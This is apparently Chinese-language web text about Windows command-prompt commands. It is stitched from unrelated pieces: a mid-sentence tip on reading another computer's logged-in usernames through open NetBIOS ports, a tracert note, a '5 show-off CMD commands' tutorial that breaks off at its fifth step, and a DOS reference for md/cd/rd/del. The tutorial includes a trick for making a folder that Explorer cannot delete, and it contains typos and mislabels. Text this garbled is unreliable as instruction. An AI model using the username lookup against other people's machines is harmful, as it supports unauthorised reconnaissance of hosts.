对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写tracert -参数ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

教大家5个装逼用的CMD命令，让人一看你就是个电脑高手很多电脑小白使用电脑时，只会用鼠标点来点去的，教大家5个装逼用的CMD命令，让人一看你就是个电脑高手，专门震慑小姐姐、小学生。

首先我们需要打开CMD命令提示符，这个操作大家都知道，按下键盘上的Windows+R键，然后输入“CMD”，按下回车键。

一、改变命令提示符配色我们可以先输入“Color”—“空格”—“help”，来获取颜色的帮助。

从这里可以看到，各种颜色的代码：0~7、A~F。

如果想把CMD里面的文字颜色，改变成某一个颜色的话，我们就可以输入“Color”—“空格”—“颜色代码”。

比如想把它变成紫色，就输入5，这样文字就变成紫色了。

如果想把默认的黑色背景，改成灰色的背景，可以输入“Color”—“空格”—“85”，就可以拥有灰色背景和紫色的文字。

如果想要恢复默认的风格，就输入“Color”—“空格”—“07”，就变成黑色的背景、白色的文字了。

二、查看所有网络设备的IP信息在命令提示符中输入“ipconfig”—“空格”—“/”—“alll”，这样就可以查看我们电脑上，所有的网络设备的IP信息。

三、从CMD中访问网站我们可以输入“START”—“空格”，输入我们需要访问的网址。

举个例子：输入百度的网址，按下回车键，就可以用默认的浏览器打开你输入的网站了。

四、创建与删除文件夹我们可以使用MD命令，创建一个让别人无法删除的网站，输入“MD”—“空格”，输入需要创建的文件夹名称，比如说输入“123..”，然后输入“\”。

这样就可以创建出一个带小数点的文件夹，桌面刷新以后，文件夹就会创建成功，我们可以尝试右键删除，它会提示“找不到该项目”。

如果我们需要删除这个文件夹，需要使用对应的“RD”—“空格”—“123..”—“\”，这样就可以删除它了。

五、隐藏文件夹如果我们需要隐藏某个盘符里面的文件夹，我们可以先打开盘符的路径，然后在上面的地址栏输入“cmd”按下回车键，将会打开命令提示符。

(一）md——建立子目录1．功能：创建新的子目录2．类型：内部命令3．格式：md[盘符：][路径名]〈子目录名〉4．使用说明：（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在c盘的根目录下创建名为fox的子目录；（2）在fox子目录下再创建user子目录。

c：\＞md fox （在当前驱动器c盘下创建子目录fox）c：\＞md fox \user （在fox 子目录下再创建user子目录）（二）cd——改变当前目录1．功能：改变当前目录2．类型：内部命令3．格式：cd[盘符：][路径名][子目录名]4．使用说明：（1）如果省略路径和子目录名则显示当前目录；（2）如采用“cd\”格式，则退回到根目录；（3）如采用“cd..”格式则退回到上一级目录。

例：（1）进入到user子目录；（2）从user子目录退回到子目录；（3）返回到根目录。

c:\＞cd fox\user（进入fox子目录下的user子目录）c:\fox\user＞cd.. （退回上一级根目录,注意cd后面跟着两个点".."）。

c：\fox＞cd\ （返回到根目录）c:\（三）rd——删除子目录命令1．功能：从指定的磁盘删除了目录。

2．类型：内部命令3．格式：rd[盘符：][路径名][子目录名]4．使用说明：（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用del（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用rd命令删除该子目录本身；（2）不能删除根目录和当前目录。

例：要求把c盘fox子目录下的user子目录删除，操作如下：第一步：先将user子目录下的文件删空；c\＞del c：\fox\user\*.* 或 del c:\fox\user 或 delc:\fox\user\*(注:这样只能删除文件,仍然不能删除user目录下的文件夹)第二步，删除user子目录。